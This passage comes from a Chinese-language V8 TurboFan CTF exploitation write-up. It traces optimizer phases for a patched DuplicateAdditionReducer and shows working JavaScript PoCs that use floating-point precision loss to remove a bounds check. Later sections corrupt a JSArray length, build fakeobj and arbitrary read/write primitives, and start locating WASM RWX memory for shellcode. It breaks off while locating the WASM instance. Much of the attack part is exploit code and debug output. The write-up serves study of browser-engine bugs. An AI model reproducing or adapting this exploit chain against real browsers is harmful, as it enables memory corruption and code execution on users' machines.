30    if (lhs.Is(cache_.kInteger) && rhs.Is(cache_.kInteger)) {
31      type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max());
32    } else {
33      if ((lhs.Maybe(minus_infinity_) && rhs.Maybe(infinity_)) ||
34          (rhs.Maybe(minus_infinity_) && lhs.Maybe(infinity_))) {
35        maybe_nan = true;
36      }
37      type = Type::PlainNumber();
38    }
39  }
40
41  // Take into account the -0 and NaN information computed earlier.
42  if (maybe_minuszero) type = Type::Union(type, Type::MinusZero(), zone());
43  if (maybe_nan) type = Type::Union(type, Type::NaN(), zone());
44  return type;
45}
继续看AddRanger,也就清楚了SpeculativeNumberAdd结点的range设置
 1// src\compiler\operation-typer.cc: 178
 2Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min,
 3                               double rhs_max) {
 4  double results[4];
 5  results[0] = lhs_min + rhs_min;
 6  results[1] = lhs_min + rhs_max;
 7  results[2] = lhs_max + rhs_min;
 8  results[3] = lhs_max + rhs_max;
 9  // Since none of the inputs can be -0, the result cannot be -0 either.
10  // However, it can be nan (the sum of two infinities of opposite sign).
11  // On the other hand, if none of the "results" above is nan, then the
12  // actual result cannot be nan either.
13  int nans = 0;
14  for (int i = 0; i < 4; ++i) {
15    if (std::isnan(results[i])) ++nans;
16  }
17  if (nans == 4) return Type::NaN();
18  Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone());
19  if (nans > 0) type = Type::Union(type, Type::NaN(), zone());
20  // Examples:
21  //   [-inf, -inf] + [+inf, +inf] = NaN
22  //   [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN
23  //   [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN
24  //   [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN
25  return type;
26}
(3-2) JSCall node
再跟踪下jscall结点的Typer处理，Typer::Visitor::Reduce#75处理
 1#define DECLARE_CASE(x) \
 2  case IrOpcode::k##x:  \
 3    return UpdateType(node, Type##x(node));
 4      DECLARE_CASE(Start)
 5      DECLARE_CASE(IfException)
 6      // VALUE_OP_LIST without JS_SIMPLE_BINOP_LIST:
 7      COMMON_OP_LIST(DECLARE_CASE)
 8      SIMPLIFIED_COMPARE_BINOP_LIST(DECLARE_CASE)
 9      SIMPLIFIED_OTHER_OP_LIST(DECLARE_CASE)
10      JS_SIMPLE_UNOP_LIST(DECLARE_CASE)
11      JS_OBJECT_OP_LIST(DECLARE_CASE)
12      JS_CONTEXT_OP_LIST(DECLARE_CASE)
13      JS_OTHER_OP_LIST(DECLARE_CASE)  //JSCall在这里处理
14#undef DECLARE_CASE
这个处理比较容易跟踪，最终在JSCallTyper处理，可以看到调用Math.random()将return Type::PlainNumber();
 1// src\compiler\typer.cc#1417
 2Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
 3  if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) {
 4    return Type::NonInternal();
 5  }
 6  JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction();
 7  if (!function.shared().HasBuiltinFunctionId()) {
 8    return Type::NonInternal();
 9  }
10  switch (function.shared().builtin_function_id()) {
11    case BuiltinFunctionId::kMathRandom:
12      return Type::PlainNumber();
(3-3) NumberConstant node
NumberConstant设置range
其他的node也会一一通过typerphase设置type。
（4）TypedLoweringPhase
直到这个phase添加了比较多的reducer，我才意识到v8对于sea of nodes的整体遍历逻辑：v8在开始reduce之前，会从end开始进行深度优先遍历，将遍历的nodepush到stack_中，然后从stack_顶部开始调用Reduce进行处理。Reduce中循环遍历reducers_中的全部reducer，分别调用reducer->Reduce(node)处理。
bool PipelineImpl::CreateGraph(){}调用TypedLoweringPhase，其中添加的Reducer包括题目中patch的DuplicateAdditionReducer，TypedLoweringPhase->Run()添加多个Reducer后，最后调用graph_reducer.ReduceGraph():
1void GraphReducer::ReduceGraph() { ReduceNode(graph()->end()); }
graph()->end()即获得Graph类的成员变量_end,其指向sea of nodes的最后一个opcode为end的结点。跟入ReduceNode，走读参考添加的注释
 1// src\compiler\graph-reducer.cc: 48
 2void GraphReducer::ReduceNode(Node* node) {
 3  // 维护stack_栈，保存从end_开始遍历到的node
 4  DCHECK(stack_.empty());  
 5  // 维护revisit_队列，顾名思义及for中else if的代码，是有必要重新ReduceTop()处理的node
 6  DCHECK(revisit_.empty());
 7  // 将end_结点push到stack_  
 8  Push(node);
 9  for (;;) {
10    if (!stack_.empty()) {
11      // Process the node on the top of the stack, potentially pushing more or
12      // popping the node off the stack.
13      /* ReduceTop中，通过对stack_栈顶的node的inputs成员进行深度优先搜索，将遍历到的node都push到
14       * stack_
15      */
16      ReduceTop();
17    } else if (!revisit_.empty()) {
18      // If the stack becomes empty, revisit any nodes in the revisit queue.
19      Node* const node = revisit_.front();
20      revisit_.pop();
21      if (state_.Get(node) == State::kRevisit) {
22        // state can change while in queue.
23        Push(node);
24      }
25    } else {
26      // Run all finalizers.
27      // stack_和revisit_全部结点处理完，进行清理工作
28      for (Reducer* const reducer : reducers_) reducer->Finalize();
29
30      // Check if we have new nodes to revisit.
31      if (revisit_.empty()) break;
32    }
33  }
34  DCHECK(revisit_.empty());
35  DCHECK(stack_.empty());
36}
继续跟入GraphReducer::ReduceTop()（分析见注释），行37有个max_id，可以在sea of nodes中搜索到node
 1// src\compiler\graph-reducer.cc: 120
 2void GraphReducer::ReduceTop() {
 3  // 取stack_.top
 4  NodeState& entry = stack_.top();
 5  Node* node = entry.node;
 6  DCHECK_EQ(State::kOnStack, state_.Get(node));
 7
 8  if (node->IsDead()) return Pop();  // Node was killed while on stack.
 9
10  // 取node的inputs集合
11  Node::Inputs node_inputs = node->inputs();
12
13  // Recurse on an input if necessary.
14  // 因为是递归，这里的entry.input_index记录了每个当前node访问到的inputs集合的下标
15  int start = entry.input_index < node_inputs.count() ? entry.input_index : 0;
16  for (int i = start; i < node_inputs.count(); ++i) {
17    Node* input = node_inputs[i];
18    // Recurse(input)将input push 到 stack_
19    if (input != node && Recurse(input)) {
20      // 当前的node的input_index + 1
21      entry.input_index = i + 1;
22      // 返回，继续遍历stack_.top
23      return;
24    }
25  }
26
27  // 重新检测一遍是否有未访问的结点
28  for (int i = 0; i < start; ++i) {
29    Node* input = node_inputs[i];
30    if (input != node && Recurse(input)) {
31      entry.input_index = i + 1;
32      return;
33    }
34  }
35
36  // Remember the max node id before reduction.
37  NodeId const max_id = static_cast(graph()->NodeCount() - 1);
38
39  // All inputs should be visited or on stack. Apply reductions to node.
40  // 所有的node都将被遍历或在栈上。
41  // Reduce(node)，循环使用Phase入口处Add的所有reducer对当前node处理
42  Reduction reduction = Reduce(node);
43
44  // If there was no reduction, pop {node} and continue.
45  if (!reduction.Changed()) return Pop();
46
47  // Check if the reduction is an in-place update of the {node}.
48  Node* const replacement = reduction.replacement();
49  if (replacement == node) {
50    // In-place update of {node}, may need to recurse on an input.
51    Node::Inputs node_inputs = node->inputs();
52    for (int i = 0; i < node_inputs.count(); ++i) {
53      Node* input = node_inputs[i];
54      if (input != node && Recurse(input)) {
55        entry.input_index = i + 1;
56        return;
57      }
58    }
59  }
60
61  // After reducing the node, pop it off the stack.
62  // 处理完的node需要pop出去
63  Pop();
64
65  // Check if we have a new replacement.
66  if (replacement != node) {
67    Replace(node, replacement, max_id);
68  } else {
69    // Revisit all uses of the node.
70    for (Node* const user : node->uses()) {
71      // Don't revisit this node if it refers to itself.
72      if (user != node) Revisit(user);
73    }
74  }
75}
跟入GraphReducer::Reduce(Node* const node)，在这个函数中，我们可以尝试定位题目添加的DuplicateAdditionReducer -> Reduce()处理我们的y = y + 1 +1结点，这是个思路，说不定这个相关结点被之前的phase处理的面目全非了
 1// src\compiler\graph-reducer.cc: 81
 2Reduction GraphReducer::Reduce(Node* const node) {
 3  auto skip = reducers_.end();
 4  // reducers_保存phase入口add的全部reducer
 5  for (auto i = reducers_.begin(); i != reducers_.end();) {
 6    if (i != skip) {
 7      // 调用每一个reducer->Reduce()处理node
 8      Reduction reduction = (*i)->Reduce(node);
 9      if (!reduction.Changed()) {
10        // No change from this reducer.
11      } else if (reduction.replacement() == node) {
12        // {replacement} == {node} represents an in-place reduction. Rerun
13        // all the other reducers for this node, as now there may be more
14        // opportunities for reduction.
15        if (FLAG_trace_turbo_reduction) {
16          StdoutStream{} << "- In-place update of " << *node << " by reducer "
17                         << (*i)->reducer_name() << std::endl;
18        }
19        skip = i;
20        i = reducers_.begin();
21        continue;
22      } else {
23        // {node} was replaced by another node.
24        if (FLAG_trace_turbo_reduction) {
25          StdoutStream{} << "- Replacement of " << *node << " with "
26                         << *(reduction.replacement()) << " by reducer "
27                         << (*i)->reducer_name() << std::endl;
28        }
29        return reduction;
30      }
31    }
32    ++i;
33  }
34  if (skip == reducers_.end()) {
35    // No change from any reducer.
36    return Reducer::NoChange();
37  }
38  // At least one reducer did some in-place reduction.
39  return Reducer::Changed(node);
40}
ok，重新理一下思路，回看我们失败的poc（下面的代码），我们最初的想法是当x==0时，y=9007199254740991，走到行4时，y=9007199254740991+1+1 => y=9007199254740992 => y = y-9007199254740991 => 1；当x==1时，因为题目补丁的存在（补丁对x==0时y的值无影响）y=9007199254740992+1+1 => y=9007199254740992+2 => y=9007199254740994 => y = 9007199254740994 - 9007199254740991 => 3
如上算式，最后y==3，而arr是长度为2的数组，最后return arr[y]时导致越界。这是我们最初构造poc时的想法，看似没有问题的。但poc最后print(res)结果为1.2，说明事实上并没有越界
 1let opt_me = (x) => {
 2    let arr = new Array(1.1,1.2);
 3  let y = ( x==1 ) ? 9007199254740992 : 9007199254740991;
 4  y = y + 1 + 1；
 5  y = y - 9007199254740991; // max=1, actual max=2
 6  return arr[y];
 7}
 8
 9opt_me(0);
10%OptimizeFunctionOnNextCall(opt_me);
11let res = opt_me(1);
12print(res);
按照我们之前走读的代码，我们继续深入调试一下失败的poc。如下图，首次调用到DuplicateAdditionReducer -> Reduce()时，当前处理的node的opcode为NumberConstant
那么根据我们前文对代码的分析，我们可以从sea of nodes中定位到如下#45结点，因为这是从End结点进行深度优先搜索的第一个无inputs的结点，是符合我们上面断点调试的信息
事实上从上图，我们看到#40和#41两个add的node如下图，并不是题目补丁中switch的opcodekNumberAdd，这难道是poc不成功的原因？
答案是否定的，在调试的过程中，当DuplicateAdditionReducer -> Reduce()处理到#40结点时确实因为不匹配opcode没能进入后续处理的代码，但是后续其他的reduce在处理这个node时将SpeculativeNumberAdd优化为kNumberAdd，对#41也同样如此。
如下图，断在#40node，单步跟入DuplicateAdditionReducer -> ReduceAddition(Node *node)
如下图查看此时参数node的信息，三个DCHECK_EQ是没有问题的ControlInputCount => control_in_==0``EffectInputCount => effect_in_==0``ValueInputCount => value_in_==2，opcode也是kNumberAdd
根据补丁代码，继续查看当前node的left_node的opcode，如下图left->op_为Phi，显然是不等于node的NumberAdd的，所以没能走入补丁的核心逻辑
从sea of nodes也能看得出来left的opcode
ok，我们本来的意图也是在下面这个NumberAdd结点进入补丁核心逻辑，从而合并右侧两个常量。
断点断下，变量信息如下图
从图中可以看到left的opcode为NumberConstant？不应该是上面的kNumberAdd结点吗？难道右侧结点是kNumberAdd左侧结点是常量？ok，我们在调试器的监视中看下右侧结点的opcode
node->inputs_.inline_[0]->op_->mnemonic_和node->inputs_.inline_[1]->op_->mnemonic_分别为node结点的左右父节点的opcode的字符串表示，如上图所示，两个都是常量？我们从sea of nodes中看到的不应该是左add右常量吗？我们看下左结点的sea of nodes信息，如下图
ok，到这我们大概就清楚了，左结点#40的type为range(9007199254740992, 9007199254740992 )，被优化为NumberConstant了，所以调试信息左右结点全显示为NumberConstant。
那么问题又来了，我在构造poc时已经下意识防止出现这样的优化情况，所以使用了(x==1)? :这样的表达式，为的就是产生Phi结点，防止优化成NumberConstant。原来是因为，Phi的range(9007199254740991, 9007199254740992)，因为IEEE-754精度丢失的问题，导致其中每一个元素和+1+1运算的结果均为9007199254740992，所以导致#40在优化过程中还是被优化为了NumberConstant。最终还是没能走到补丁的核心代码，至此，poc为啥失败的原因就分析清楚了。
（5）SimplifiedLowering Phase
阅读这个phase主要是和优化CheckBounds结点相关。不像之前分析的Phase，调用位置在PipelineCompilationJob::Status PipelineCompilationJob::PrepareJobImpl()-->bool PipelineImpl::CreateGraph()函数中，SimplifiedLowering Phase的调用位置在PipelineCompilationJob::Status PipelineCompilationJob::ExecuteJobImpl()-->bool PipelineImpl::OptimizeGraph(Linkage* linkage)中，也有很多的phase运行在这个阶段。
跟踪SimplifiedLowering Phase的调用流：SimplifiedLoweringPhase::Run()-->SimplifiedLowering::LowerAllNodes()-->RepresentationSelector::Run()-->RepresentationSelector::VisitNode()中使用switch opcode处理各个结点，处理CheckBounds代码如下
 1      // src\compiler\simplified-lowering.cc: 2401
 2      case IrOpcode::kCheckBounds: {
 3        const CheckParameters& p = CheckParametersOf(node->op());
 4        // 左结点是index，获取其type
 5        Type index_type = TypeOf(node->InputAt(0));
 6
 7        // 右结点时Length，获取其type
 8        Type length_type = TypeOf(node->InputAt(1));
 9        if (index_type.Is(Type::Integral32OrMinusZero())) {
10          // Map -0 to 0, and the values in the [-2^31,-1] range to the
11          // [2^31,2^32-1] range, which will be considered out-of-bounds
12          // as well, because the {length_type} is limited to Unsigned31.
13          VisitBinop(node, UseInfo::TruncatingWord32(),
14                     MachineRepresentation::kWord32);
15          if (lower() && lowering->poisoning_level_ ==
16                             PoisoningMitigationLevel::kDontPoison) {
17
18            // IsNone()的判断不太理解。
19              // 后续，判断index的max < length的min，且index的min >= 0.0
20              // 则直接使用左结点替换本checkbounds
21            if (index_type.IsNone() || length_type.IsNone() ||
22                (index_type.Min() >= 0.0 &&
23                 index_type.Max() < length_type.Min())) {
24              // The bounds check is redundant if we already know that
25              // the index is within the bounds of [0.0, length[.
26              DeferReplacement(node, node->InputAt(0));
27            }
28          }
29        } else {
30          VisitBinop(
31              node,
32              UseInfo::CheckedSigned32AsWord32(kIdentifyZeros, p.feedback()),
33              UseInfo::TruncatingWord32(), MachineRepresentation::kWord32);
34        }
35        return;
36      }
CheckBounds的index范围来自NumberSub结点的range，而在补丁代码中合并两个常量结点后，并没有去更新相关结点的range(更新range的相关函数UpdateRange)
1// -----------------------------------------------------------------------------
2// Union and intersection
3
4Type Type::Intersect(Type type1, Type type2, Zone* zone) {
导致了CheckBounds的错误消除。我们可以看TypedLowering Phase后的sea of nodes
成功的POC
 1let opt_me = (x) => {
 2  let arr = new Array(1.1,1.2,1.3,1.4);
 3  let y = ( x==1 ) ? 9007199254740992 : 9007199254740989;
 4  y = y + 1 + 1;
 5  y = y - 9007199254740989; // max=3, actual max=5
 6  return arr[y];
 7}
 8
 9
10opt_me(0);
11%OptimizeFunctionOnNextCall(opt_me);
12let res = opt_me(1);
13print(res);
上述poc运行结果如下，越界读取了arr的值
分别看下SimplifiedLowering运行前后，CheckBounds结点优化的情况，优化前LoadElement前，CheckBounds结点存在；从下图的After Typerphase得知CheckBounds Range(2,3)，其就是x分别等于9007199254740992及9007199254740989计算得到，其范围恒小于数组的长度。在SimplifiedLowering后，CheckBounds被优化掉，从而导致最终的越界成功

Exploitation
这一节部分linux的调试信息是翻译introduction to turbofan的内容，win下的代码和linux的思路基本是一致的。文章最后贴出在win下调试的exp。
扩大越界范围
 1let ab = new ArrayBuffer(8);
 2let fv = new Float64Array(ab);
 3let dv = new BigUint64Array(ab);
 4
 5let f2i = (f) => {
 6  fv[0] = f;
 7  return dv[0];
 8}
 9
10let hexprintablei = (i) => {
11  return (i).toString(16).padStart(16,"0");
12}
13
14let debug = (x,z, leak) => {
15  print("oob index is " + z);
16  print("length is " + x.length);
17  print("leaked 0x" + hexprintablei(f2i(leak)));
18  //%DebugPrint(x);
19  %SystemBreak();
20  //%DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
21};
22
23let opt_me = (x) => {
24  let arr = new Array(1.1,1.2,1.3,1.4);
25  let y = (( x==1 ) ? 9007199254740992 : 9007199254740989) + 1 + 1;
26  y = y - 9007199254740989; // max=3, actual max=5
27  let leak = arr[y];
28  %DebugPrint(arr);
29  if (x == 1)
30    debug(arr,y, leak);
31  return leak;
32}
33
34
35opt_me(0);
36%OptimizeFunctionOnNextCall(opt_me);
37let res = opt_me(1);
调试输出如下，行7是越界读取的数据
 1oob index is 5
 2length is 4
 3---------------------------------------------------
 4Begin compiling StoreFastElementStub using Turbofan
 5---------------------------------------------------
 6Finished compiling method StoreFastElementStub using Turbofan
 7leaked 0x0000017411f82d29
 8DebugPrint: 000000379AE0DF41: [JSArray]
 9 - map: 0x018577982931 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
10 - prototype: 0x0091e3286469 0]>
11 - elements: 0x00379ae0df11 4]> [PACKED_DOUBLE_ELEMENTS]
12 - length: 4
13 - properties: 0x017411f82d29 0]> {
14    #length: 0x01cd60b1cd39  (const accessor descriptor)
15 }
16 - elements: 0x00379ae0df11 4]> {
17           0: 1.1
18           1: 1.2
19           2: 1.3
20           3: 1.4
21 }
220000018577982931: [Map]
23 - type: JS_ARRAY_TYPE
24 - instance size: 32
25 - inobject properties: 0
26 - elements kind: PACKED_DOUBLE_ELEMENTS
elements对应的内存如下，可以看到上面越界的数据位于0x00379ae0df48
（1）Corrupting a JSArray
上图的FixedDoubleArray的elements里，第二个成员也是数组长度，但是这个长度仅仅是提供fixed array的内存申请的信息，最终判断数组长度的还是JSArray的length。如下的情况，JSArray的length为1，而FixedArray的length为17
 1d8> let a = new Array(0);
 2undefined
 3d8> a.push(1);
 41
 5d8> %DebugPrint(a)
 6DebugPrint: 0xd893a90aed1: [JSArray]
 7- map: 0x18bbbe002ca1  [FastProperties]
 8- prototype: 0x1cf26798fdb1 
 9- elements: 0x0d893a90d1c9  [HOLEY_SMI_ELEMENTS]
10- length: 1
11- properties: 0x367210500c19  {
12#length: 0x0091daa801a1  (const accessor descriptor)
13}
14- elements: 0x0d893a90d1c9  {
150: 1
161-16: 0x3672105005a9 
17 }
通过修改poc，利用精度丢失越界读写JSArray的length。修改了arr1自身的JSArray的length
 1let AB_LENGTH = 0x233;
 2let NEW_LENGTH64  = 0x0000006400000000;
 3let ab = new ArrayBuffer(8);
 4let fv = new Float64Array(ab);
 5let dv = new BigUint64Array(ab);
 6
 7let f2i = (f) => {
 8  fv[0] = f;
 9  return dv[0];
10}
11
12let i2f = (i) => {
13  dv[0] = BigInt(i);
14  return fv[0];
15}
16
17let tagFloat = (f) => {
18  fv[0] = f;
19  dv[0] += 1n;
20  return fv[0];
21}
22
23let hexprintablei = (i) => {
24  return (i).toString(16).padStart(16,"0");
25}
26
27let debug = (x,z, leak) => {
28  print("oob index is " + z);
29  print("length is " + x.length);
30  print("leaked 0x" + hexprintablei(f2i(leak)));
31  //%DebugPrint(x);
32  %SystemBreak();
33  //%DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
34};
35
36let opt_me = (x) => {
37  let arr = new Array(1.1,1.2,1.3,1.4,1.5,1.6,1.7);
38  let y = (( x==1 ) ? 9007199254740992 : 9007199254740989) + 1 + 1;
39  y = y - 9007199254740989; // max=2, actual max=5
40  y = y * 2; // max=4, actual max=10
41  arr[y] = 2.121995790965e-312;  // corrupt arr.length => i2f(NEW_LENGTH64)
42
43  let leak = arr[y];
44  let arr2 = Array.of(1.2);
45  let evil_ab = new ArrayBuffer(AB_LENGTH);
46
47  if (x == 1){
48    %DebugPrint(arr);
49    debug(arr,y, leak);
50    print("array's length: "+ arr.length + " + " + i2f(NEW_LENGTH64));
51    print("oob read: " + arr[20]);
52  }
53  return leak;
54}
55opt_me(0);
56%OptimizeFunctionOnNextCall(opt_me);
57let res = opt_me(1);
输出如下，行5看到arr对象的length修改为0x64
 1DebugPrint: 000003517A90E181: [JSArray]
 2 - map: 0x032b3e982931  [FastProperties]
 3 - prototype: 0x00a00e086469 
 4 - elements: 0x03517a90e139  [PACKED_DOUBLE_ELEMENTS]
 5 - length: 100
 6 - properties: 0x009779682d29  {
 7    #length: 0x02b5c4e1cd39  (const accessor descriptor)
 8 }
 9 - elements: 0x03517a90e139  {
10           0: 1.1
11           1: 1.2
12           2: 1.3
13           3: 1.4
14           4: 1.5
15           5: 1.6
16           6: 1.7
17 }
180000032B3E982931: [Map]
19 - type: JS_ARRAY_TYPE
20 - instance size: 32
21 - inobject properties: 0
22 - elements kind: PACKED_DOUBLE_ELEMENTS
23 - unused property fields: 0
24 - enum length: invalid
25 - back pointer: 0x032b3e9828e1 
26 - prototype_validity cell: 0x02b5c4e02201 
27 - instance descriptors #1: 0x00a00e0866c9 
28 - layout descriptor: 0000000000000000
29 - transitions #1: 0x00a00e086639 Transition array #1:
30     0x0097796c5511 : (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x032b3e982981 
31
32 - prototype: 0x00a00e086469 
33 - constructor: 0x00a00e086229 
34 - dependent code: 0x009779682391 
35 - construction counter: 0
36
37oob index is 10
38length is 100
39leaked 0x0000006400000000
40array's length: 100 + 2.121995790965e-312
41
42
43#
44# Fatal error in ../../..\src/objects/fixed-array-inl.h, line 181
45# Debug check failed: index >= 0 && index < this->length().
46#
47#
48#
49#FailureMessage Object: 00000023D3FFD5F8
50==== C stack trace ===============================
51
52        v8::base::debug::StackTrace::StackTrace [0x00007FFBEEEB2C7C+44] (F:\Research\chrome2\v8\v8\src\base\debug\stack_trace_win.cc:168)
53        v8::platform::`anonymous namespace'::PrintStackTrace [0x00007FFBE61AF7E4+36] (F:\Research\chrome2\v8\v8\src\libplatform\default-platform.cc:27)
54        ......
同样我们在内存中也可以看到JSArray的length修改为0x64
上面测试代码最后crash了，调用栈如下
调用栈的第5层，调试信息如下，this指向FixedArray，index是测试代码里越界的下标
DCHECK为debug编译时的宏代码如下，release时则不存在
 1// src\base\logging.h: 55
 2#ifdef DEBUG
 3
 4#define DCHECK_WITH_MSG(condition, message)   \
 5  do {                                        \
 6    if (V8_UNLIKELY(!(condition))) {          \
 7      V8_Dcheck(__FILE__, __LINE__, message); \
 8    }                                         \
 9  } while (0)
10#define DCHECK(condition) DCHECK_WITH_MSG(condition, #condition)
为后续调试方便我这里直接在源码中修改后重新编译。
后续调试，Array的indexOf搜索下标，但是debug版本在CSA会检测indexOf的index，同样程序会crash，也是DEBUG模式的断言，这里也注释掉CSA_ASSERT
 1// src\code-stub-assembler.cc: 2384
 2TNode CodeStubAssembler::LoadFixedDoubleArrayElement(
 3    SloppyTNode object, Node* index_node,
 4    MachineType machine_type, int additional_offset,
 5    ParameterMode parameter_mode, Label* if_hole) {
 6    CSA_ASSERT(this, IsFixedDoubleArray(object));
 7    DCHECK_EQ(additional_offset % kPointerSize, 0);
 8    CSA_SLOW_ASSERT(this, MatchesParameterMode(index_node, parameter_mode));
 9    int32_t header_size =
10        FixedDoubleArray::kHeaderSize + additional_offset - kHeapObjectTag;
11    TNode offset = ElementOffsetFromIndex(
12        index_node, HOLEY_DOUBLE_ELEMENTS, parameter_mode, header_size);
13    /*CSA_ASSERT(this, IsOffsetInBounds(
14    offset, LoadAndUntagFixedArrayBaseLength(object),
15    FixedDoubleArray::kHeaderSize, HOLEY_DOUBLE_ELEMENTS));*/
16    return LoadDoubleWithHoleCheck(object, offset, if_hole, machine_type);
17}
（2）Getting fake object
PACKED_ELEMENTS类型的数组能存储指向JS OBJ的tagged pointer(+1)，V8的elements kind提供了当前JsArray存储元素的类型信息。例：
1d8> var objects = new Array(new Object())
2d8> %DebugPrint(objects)
3DebugPrint: 0xd79e750aee9: [JSArray]
4- elements: 0x0d79e750af19  {
50: 0x0d79e750aeb1 
6}
70x19c550d82d91: [Map]
8 - elements kind: PACKED_ELEMENTS
如果可以破坏PACKED_ELEMENTS的数组元素，那么就可以存入一个指向精心构造的对象的指针。所以，我们现在基本的思路就是在这样的数组中存入一个backing_store + 1（tagged）的地址。
进行一个简单的测试，测试一下存入0x41414141。
任何object的第一个成员都是一个指向map的指针（map描述对象的类型信息），在其他的引擎中成为Shape或者Structure。
所以，当v8将0x41414141解析为obj时，我们希望能得到该地址的解引用crash。
 1// evil_ab是ArrayBuffer对象，另声明packed_elements_array数组
 2evil_ab = new ArrayBuffer(AB_LENGTH);
 3packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI);
 4
 5let view = new BigUint64Array(evil_ab);
 6// fakeobj -> fakemap
 7view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer
 8
 9// 利用arr2的越界修改packed_elements_array的Math对象指针,为evil_ab fakeobj
10arr2[index_to_object_pointer] = tagFloat(evil_ab_backingstore_ptr);
11packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer
（3）Arbitrary read/write primitive
思路是伪造一个backing_store可控的ArrayBuffer。如下demo，任意写的基本实现
 1let view = new BigUint64Array(evil_ab);
 2for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
 3  // 通过arr2的越界读写复制evil_ab的object信息到view对象的ArrayBuffer中，即fakeobj
 4  view[i] = f2i(arr2[ab_len_idx-3+i]);
 5
 6  // 非length字段 且 非tagged obj ptr
 7  if (view[i] > 0x10000 && !(view[i] & 1n))
 8    // 即伪造backing_store指针，也是obj的第五个成员
 9    view[i] = 0x42424242n; // backing_store
10}
11// [...]
12// 修改packed_elements_array的Math对象指针指向fakeobj
13arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer
14// [...]
15// 利用rw_view实现任意写
16let rw_view = new Uint32Array(packed_elements_array[1]);
17rw_view[0] = 0x1337; // *0x42424242 = 0x1337
输出如下
 1$ d8 rw.js 
 2[+] corrupted JSArray's length
 3[+] Found backingstore pointer : 0000555c593d9890
 4Received signal 11 SEGV_MAPERR 000042424242
 5==== C stack trace ===============================
 6 [0x555c577b81a4]
 7 [0x7ffa0331a390]
 8 [0x555c5711b4ae]
 9 [0x555c5728c967]
10 [0x555c572dc50f]
11 [0x555c572dbea5]
12 [0x555c572dbc55]
13 [0x555c57431254]
14 [0x555c572102fc]
15 [0x555c57215f66]
16 [0x555c576fadeb]
17[end of stack trace]
如上思路实现任意读写，或者可以伪造float类型obj，通过elements指针实现任意读写，但是写数据过程中会存在数据的破坏，ArrayBuffer不会。
（4）Overwriting WASM RWX memory
至此，我们拥有了AAR/W能力，完成利用的最后一块拼图最简单的思路，找一块RWX的内存，写入shellcode并执行，这比ROP或者JIT CODE REUSE方便多了。
V8以前将JITed codeofJSFunction放在RWX的内存中，但是后来修改了：
1/*
2https://source.chromium.org/chromium/v8/v8.git/+/dde25872f58951bb0148cf43d6a504ab2f280485:src/flag-definitions.h;l=717
3*/
4DEFINE_BOOL(write_protect_code_memory, V8_WRITE_PROTECT_CODE_MEMORY_BOOL,
5            "write protect code memory")
但是，Andrea Biondo发现，WASM is still using RWX memory。
所以，我们可以找到一个WASM实例，定位到其JumpTableStart，即指向RWX的指针。步骤如下：
获取JSFunction的shared function info；
从shared function info中获取WASM的exported function信息；
从exported function中获取WASM实例；
从WASM实例获取JumpTableStart域；
通过Jeremy_x86开发的gdb插件可以比较轻松的识别到JumpTableStart（v8_doare_helpers），通过命令%DumpObjects识别如下
1----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
2[...]
30x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]
测试手动定位一下，测试代码sample_wasm.js
 1d8> load("sample_wasm.js")
 2d8> %DumpObjects(global_test,10)
 3----- [ JS_FUNCTION_TYPE : 0x38 ] -----
 40x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
 50x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
 60x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
 70x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE   <=================
 80x00002fac7911ed30    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
 90x00002fac7911ed38    0x00000d1caca00691    FEEDBACK_CELL_TYPE    
100x00002fac7911ed40    0x00002dc28a002001    CODE_TYPE    
11----- [ TRANSITION_ARRAY_TYPE : 0x30 ] -----
120x00002fac7911ed48    0x00000cdfc0080b69    MAP_TYPE    
130x00002fac7911ed50    0x0000000400000000    
140x00002fac7911ed58    0x0000000000000000    
15function 1() { [native code] }
16
17
18
19d8> %DumpObjects(0x00002fac7911ecd9,11)
20----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
210x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
220x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE   <=========== 
230x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
240x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
250x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
260x00002fac7911ed00    0x000000000000004f    
270x00002fac7911ed08    0x000000000000ff00    
28----- [ JS_FUNCTION_TYPE : 0x38 ] -----
290x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
300x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
310x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
320x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE    
3352417812098265
34
35
36d8> %DumpObjects(0x00002fac7911ecb1,11)
37----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] -----
380x00002fac7911ecb0    0x00000cdfc00857a9    MAP_TYPE    
390x00002fac7911ecb8    0x00002dc28a002001    CODE_TYPE    
400x00002fac7911ecc0    0x00002fac7911eb29    WASM_INSTANCE_TYPE  <========================  
410x00002fac7911ecc8    0x0000000000000000    
